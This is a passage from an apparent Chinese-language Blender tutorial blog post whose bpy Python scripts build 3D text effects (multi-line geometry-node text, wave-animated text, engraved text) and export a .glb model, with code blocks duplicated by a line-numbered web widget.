    flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
    flip_faces_node.location = (250, -100)

    # 创建 Join Geometry 节点
    join_geometry_node = node_tree.nodes.new(type='GeometryNodeJoinGeometry')
    join_geometry_node.location = (450, 50)

    # 创建 Realize Instances 节点
    realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
    realize_instances_node.location = (650, 50)

    # 创建 Merge by Distance 节点
    merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
    merge_by_distance_node.location = (850, 50)

    # get output node
    output_node = node_tree.nodes.get("Group Output")
    output_node.location = (1050, 50)

    # 连接节点
    node_tree.links.new(string_to_curves_node.outputs[0], resample_curve_node.inputs[0])
    node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
    node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(flip_faces_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(join_geometry_node.outputs[0], realize_instances_node.inputs[0])
    node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
    node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])

    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    import bpy
    import os
    import numpy as np

    # 获取当前选中的网格对象
    bpy.ops.mesh.primitive_cube_add()
    text_obj = bpy.context.object

    # 创建 Geometry Nodes 网络
    text_modifier_geometrynodes = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
    bpy.ops.node.new_geometry_node_group_assign()
    node_tree = text_modifier_geometrynodes.node_group

    # delete Group Input
    node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

    # 创建 String to Curves 节点
    string_to_curves_node = node_tree.nodes.new(type='GeometryNodeStringToCurves')
    string_to_curves_node.location = (-400, 50)

    string_to_curves_node.align_x = "CENTER"
    string_to_curves_node.align_y = "MIDDLE"
    string_to_curves_node.inputs[0].default_value = "Hello,\nWorld!"
    string_to_curves_node.inputs[1].default_value = 2.2

    string_to_curves_node.font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf')))

    # 创建 Resample Curve 节点
    resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
    resample_curve_node.location = (-150, 50)

    resample_curve_node.mode = "EVALUATED"

    # 创建 Fill Curve 节点
    fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
    fill_curve_node.location = (50, 50)

    # 创建 Extrude Mesh 节点
    extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
    extrude_mesh_node.location = (250, 150)

    extrude_mesh_node.inputs[3].default_value = 0.4
    extrude_mesh_node.inputs[4].default_value = False

    # 创建 Flip Faces 节点
    flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
    flip_faces_node.location = (250, -100)

    # 创建 Join Geometry 节点
    join_geometry_node = node_tree.nodes.new(type='GeometryNodeJoinGeometry')
    join_geometry_node.location = (450, 50)

    # 创建 Realize Instances 节点
    realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
    realize_instances_node.location = (650, 50)

    # 创建 Merge by Distance 节点
    merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
    merge_by_distance_node.location = (850, 50)

    # get output node
    output_node = node_tree.nodes.get("Group Output")
    output_node.location = (1050, 50)

    # 连接节点
    node_tree.links.new(string_to_curves_node.outputs[0], resample_curve_node.inputs[0])
    node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
    node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(flip_faces_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(join_geometry_node.outputs[0], realize_instances_node.inputs[0])
    node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
    node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])

    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"

    [3.x] Create Multi-line Text Using Geometry Nodes In Blender | Easy Step-by-Step Tutorial

    调整之前的 Geometry Node,使其可以多行显示文字:

    png

    -
    import bpy
    import os
    import numpy as np

    # 获取当前选中的网格对象
    bpy.ops.mesh.primitive_cube_add()
    text_obj = bpy.context.object

    # 创建 Geometry Nodes 网络
    text_modifier_geometrynodes = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
    bpy.ops.node.new_geometry_node_group_assign()
    node_tree = text_modifier_geometrynodes.node_group

    # delete Group Input
    node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

    # 创建 Special Characters 节点
    special_characters_node = node_tree.nodes.new(type='FunctionNodeInputSpecialCharacters')
    special_characters_node.location = (-800, 200)

    # 创建 String to Curves 节点
    string_to_curves_nodes = []
    for i in range(2):
    string_to_curves_nodes.append(node_tree.nodes.new(type='GeometryNodeStringToCurves'))
    string_to_curves_nodes[-1].location = (-400, 350 - 400 * i)
    string_to_curves_nodes[-1].align_x = "CENTER"
    string_to_curves_nodes[-1].align_y = "MIDDLE"
    string_to_curves_nodes[-1].inputs[1].default_value = 2.2
    string_to_curves_nodes[0].font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf')))
    string_to_curves_nodes[1].font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Ourland.otf')))

    # 创建 Resample Curve 节点
    resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
    resample_curve_node.location = (250, 50)

    resample_curve_node.mode = "EVALUATED"

    # 创建 Fill Curve 节点
    fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
    fill_curve_node.location = (450, 50)

    # 创建 Extrude Mesh 节点
    extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
    extrude_mesh_node.location = (650, 150)

    extrude_mesh_node.inputs[3].default_value = 0.4
    extrude_mesh_node.inputs[4].default_value = False

    # 创建 Flip Faces 节点
    flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
    flip_faces_node.location = (650, -100)

    # 创建 Join Geometry 节点
    join_geometry_nodes = []
    for i in range(2):
    join_geometry_nodes.append(node_tree.nodes.new(type='GeometryNodeJoinGeometry'))
    join_geometry_nodes[0].location = (50, 50)
    join_geometry_nodes[1].location = (850, 50)

    # 创建 Realize Instances 节点
    realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
    realize_instances_node.location = (1050, 50)

    # 创建 Merge by Distance 节点
    merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
    merge_by_distance_node.location = (1250, 50)

    # get output node
    output_node = node_tree.nodes.get("Group Output")
    output_node.location = (1450, 50)

    # 创建 String 节点
    string_nodes = []
    for i in range(3):
    string_nodes.append(node_tree.nodes.new(type='FunctionNodeInputString'))
    string_nodes[-1].location = (-800, -150 * i + 50)
    string_nodes[0].string = 'Taco'
    string_nodes[1].string = 'Tuesday!'
    string_nodes[2].string = 'gigigigigi~'

    # 创建 Join Strings 节点
    join_strings_node = node_tree.nodes.new(type='GeometryNodeStringJoin')
    join_strings_node.location = (-600, 75)

    # 创建 Set Position 节点
    set_position_nodes = []
    for i in range(2):
    set_position_nodes.append(node_tree.nodes.new(type='GeometryNodeSetPosition'))
    set_position_nodes[-1].location = (-150, -250 * i + 200)
    set_position_nodes[0].inputs[3].default_value[1] = 2
    set_position_nodes[1].inputs[3].default_value[1] = -1

    # 连接节点
    node_tree.links.new(special_characters_node.outputs[0], join_strings_node.inputs[0])
    node_tree.links.new(string_nodes[1].outputs[0], join_strings_node.inputs[1])
    node_tree.links.new(string_nodes[0].outputs[0], join_strings_node.inputs[1])
    node_tree.links.new(string_nodes[2].outputs[0], string_to_curves_nodes[1].inputs[0])
    node_tree.links.new(join_strings_node.outputs[0], string_to_curves_nodes[0].inputs[0])
    node_tree.links.new(string_to_curves_nodes[0].outputs[0], set_position_nodes[0].inputs[0])
    node_tree.links.new(string_to_curves_nodes[1].outputs[0], set_position_nodes[1].inputs[0])
    node_tree.links.new(set_position_nodes[0].outputs[0], join_geometry_nodes[0].inputs[0])
    node_tree.links.new(set_position_nodes[1].outputs[0], join_geometry_nodes[0].inputs[0])
    node_tree.links.new(join_geometry_nodes[0].outputs[0], resample_curve_node.inputs[0])
    node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
    node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_nodes[1].inputs[0])
    node_tree.links.new(flip_faces_node.outputs[0], join_geometry_nodes[1].inputs[0])
    node_tree.links.new(join_geometry_nodes[1].outputs[0], realize_instances_node.inputs[0])
    node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
    node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])

    # 创建 Bevel modifier

    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True

    # 创建 SimpleDeform modifier,使文本弯曲

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    import bpy
    import os
    import numpy as np

    # 获取当前选中的网格对象
    bpy.ops.mesh.primitive_cube_add()
    text_obj = bpy.context.object

    # 创建 Geometry Nodes 网络
    text_modifier_geometrynodes = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
    bpy.ops.node.new_geometry_node_group_assign()
    node_tree = text_modifier_geometrynodes.node_group

    # delete Group Input
    node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

    # 创建 Special Characters 节点
    special_characters_node = node_tree.nodes.new(type='FunctionNodeInputSpecialCharacters')
    special_characters_node.location = (-800, 200)

    # 创建 String to Curves 节点
    string_to_curves_nodes = []
    for i in range(2):
    string_to_curves_nodes.append(node_tree.nodes.new(type='GeometryNodeStringToCurves'))
    string_to_curves_nodes[-1].location = (-400, 350 - 400 * i)
    string_to_curves_nodes[-1].align_x = "CENTER"
    string_to_curves_nodes[-1].align_y = "MIDDLE"
    string_to_curves_nodes[-1].inputs[1].default_value = 2.2
    string_to_curves_nodes[0].font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf')))
    string_to_curves_nodes[1].font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Ourland.otf')))

    # 创建 Resample Curve 节点
    resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
    resample_curve_node.location = (250, 50)

    resample_curve_node.mode = "EVALUATED"

    # 创建 Fill Curve 节点
    fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
    fill_curve_node.location = (450, 50)

    # 创建 Extrude Mesh 节点
    extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
    extrude_mesh_node.location = (650, 150)

    extrude_mesh_node.inputs[3].default_value = 0.4
    extrude_mesh_node.inputs[4].default_value = False

    # 创建 Flip Faces 节点
    flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
    flip_faces_node.location = (650, -100)

    # 创建 Join Geometry 节点
    join_geometry_nodes = []
    for i in range(2):
    join_geometry_nodes.append(node_tree.nodes.new(type='GeometryNodeJoinGeometry'))
    join_geometry_nodes[0].location = (50, 50)
    join_geometry_nodes[1].location = (850, 50)

    # 创建 Realize Instances 节点
    realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
    realize_instances_node.location = (1050, 50)

    # 创建 Merge by Distance 节点
    merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
    merge_by_distance_node.location = (1250, 50)

    # get output node
    output_node = node_tree.nodes.get("Group Output")
    output_node.location = (1450, 50)

    # 创建 String 节点
    string_nodes = []
    for i in range(3):
    string_nodes.append(node_tree.nodes.new(type='FunctionNodeInputString'))
    string_nodes[-1].location = (-800, -150 * i + 50)
    string_nodes[0].string = 'Taco'
    string_nodes[1].string = 'Tuesday!'
    string_nodes[2].string = 'gigigigigi~'

    # 创建 Join Strings 节点
    join_strings_node = node_tree.nodes.new(type='GeometryNodeStringJoin')
    join_strings_node.location = (-600, 75)

    # 创建 Set Position 节点
    set_position_nodes = []
    for i in range(2):
    set_position_nodes.append(node_tree.nodes.new(type='GeometryNodeSetPosition'))
    set_position_nodes[-1].location = (-150, -250 * i + 200)
    set_position_nodes[0].inputs[3].default_value[1] = 2
    set_position_nodes[1].inputs[3].default_value[1] = -1

    # 连接节点
    node_tree.links.new(special_characters_node.outputs[0], join_strings_node.inputs[0])
    node_tree.links.new(string_nodes[1].outputs[0], join_strings_node.inputs[1])
    node_tree.links.new(string_nodes[0].outputs[0], join_strings_node.inputs[1])
    node_tree.links.new(string_nodes[2].outputs[0], string_to_curves_nodes[1].inputs[0])
    node_tree.links.new(join_strings_node.outputs[0], string_to_curves_nodes[0].inputs[0])
    node_tree.links.new(string_to_curves_nodes[0].outputs[0], set_position_nodes[0].inputs[0])
    node_tree.links.new(string_to_curves_nodes[1].outputs[0], set_position_nodes[1].inputs[0])
    node_tree.links.new(set_position_nodes[0].outputs[0], join_geometry_nodes[0].inputs[0])
    node_tree.links.new(set_position_nodes[1].outputs[0], join_geometry_nodes[0].inputs[0])
    node_tree.links.new(join_geometry_nodes[0].outputs[0], resample_curve_node.inputs[0])
    node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
    node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_nodes[1].inputs[0])
    node_tree.links.new(flip_faces_node.outputs[0], join_geometry_nodes[1].inputs[0])
    node_tree.links.new(join_geometry_nodes[1].outputs[0], realize_instances_node.inputs[0])
    node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
    node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])

    # 创建 Bevel modifier

    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True

    # 创建 SimpleDeform modifier,使文本弯曲

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"

    Create Wavy or Curvy Text In Blender | Easy Tutorial On Wave Modifier | Dancing Text | Waving Text

    1. 新建一个 Text 对象,调整其文字, BevelAlignment

    png

    -
    import bpy

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import bpy

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    1. 给它一个 Wave 修改器,调整其参数,就会获得一个波浪动画效果:

    png

    -
    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2
    +
    1
    2
    3
    4
    5
    6
    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2

    完整代码:

    -
    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2
    1. 如果要将它立起来,先转成 Mesh

    png

    -
    text_obj.rotation_euler[0] = np.pi / 2
    +
    1
    text_obj.rotation_euler[0] = np.pi / 2
    1. 删除多余的边:MeshMergeBy distance

    png

    -
    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    +
    1
    2
    3
    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    1. 调整其 RotationObjectApplyAll Transforms

    png

    -
    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()
    +
    1
    2
    3
    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()
    1. 添加 Wave

    png

    -
    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()
    +
    1
    2
    3
    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()

    完整代码:

    -
    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    bpy.ops.object.convert(target="MESH")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)

    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    bpy.ops.object.convert(target="MESH")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)

    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2

    Easy Method to Engrave Your Text or Logo | How To Carve Any Text | 3D Text Effects In Blender

    1. 新建一个 Text 对象,设置其内容,AlignmentLocation

    png

    -
    import bpy
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.location[2] = 0.15

    text_obj.data.extrude = 0.3
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    import bpy
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.location[2] = 0.15

    text_obj.data.extrude = 0.3
    1. 转换为 MESH

    png

    -
    bpy.ops.object.convert(target="MESH")
    +
    1
    bpy.ops.object.convert(target="MESH")
    1. 按住 X 右键,删除 Limit Dissolve

    png

    -
    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.dissolve_limited()
    +
    1
    2
    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.dissolve_limited()

    4.MeshMergeBy Distance

    png

    png

    -
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    bpy.ops.object.editmode_toggle()
    +
    1
    2
    3
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    bpy.ops.object.editmode_toggle()
    1. 按住 E 网上拖,获得 Extrude

    png

    -
    bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value":(0, 0, 0.3)})
    bpy.ops.object.editmode_toggle()
    +
    1
    2
    bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value":(0, 0, 0.3)})
    bpy.ops.object.editmode_toggle()
    1. 新建一个 Cube,设置其 Scale

    png

    -
    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0:3] = [2.5, 1.2, 0.25]
    +
    1
    2
    3
    4
    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0:3] = [2.5, 1.2, 0.25]
    1. 设置 Boolean

    png

    -
    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    bpy.ops.object.modifier_apply(modifier="Boolean")

    bpy.ops.object.transform_apply()
    +
    1
    2
    3
    4
    5
    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    bpy.ops.object.modifier_apply(modifier="Boolean")

    bpy.ops.object.transform_apply()
    1. 设置材质,应用 Boolean

    png

    -
    cube_material = bpy.data.materials.new(name="Material")
    cube_material.use_nodes = True
    nodes = cube_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (0, 0, 0, 1)

    cube_obj.data.materials.append(cube_material)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    cube_material = bpy.data.materials.new(name="Material")
    cube_material.use_nodes = True
    nodes = cube_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (0, 0, 0, 1)

    cube_obj.data.materials.append(cube_material)
    1. 应用 Scale

    png

    -
    bpy.ops.object.transform_apply()
    +
    1
    bpy.ops.object.transform_apply()
    1. 设置 Bevel 及其相关参数:

    png

    -
    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.01
    cube_modifier_bevel.segments = 1
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True
    +
    1
    2
    3
    4
    5
    6
    7
    8
    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.01
    cube_modifier_bevel.segments = 1
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True
    1. 导出 .glb 格式,可被 3D Viewer 读取。

    png

    -
    bpy.ops.export_scene.gltf(filepath=os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './outputs/1')))
    +
    1
    2
    bpy.ops.export_scene.gltf(filepath=os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './outputs/1')))

    完整代码:

    -
    import bpy
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.location[2] = 0.15

    # text_obj.data.extrude = 0.3

    bpy.ops.object.convert(target="MESH")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.dissolve_limited()

    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value":(0, 0, 0.3)})
    bpy.ops.object.editmode_toggle()

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0:3] = [2.5, 1.2, 0.25]

    cube_material = bpy.data.materials.new(name="Material")
    cube_material.use_nodes = True
    nodes = cube_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (0, 0, 0, 1)

    cube_obj.data.materials.append(cube_material)

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    bpy.ops.object.modifier_apply(modifier="Boolean")

    bpy.ops.object.transform_apply()

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.01
    cube_modifier_bevel.segments = 1
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    bpy.ops.export_scene.gltf(filepath=os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './outputs/1')))
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    import bpy
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.location[2] = 0.15

    # text_obj.data.extrude = 0.3

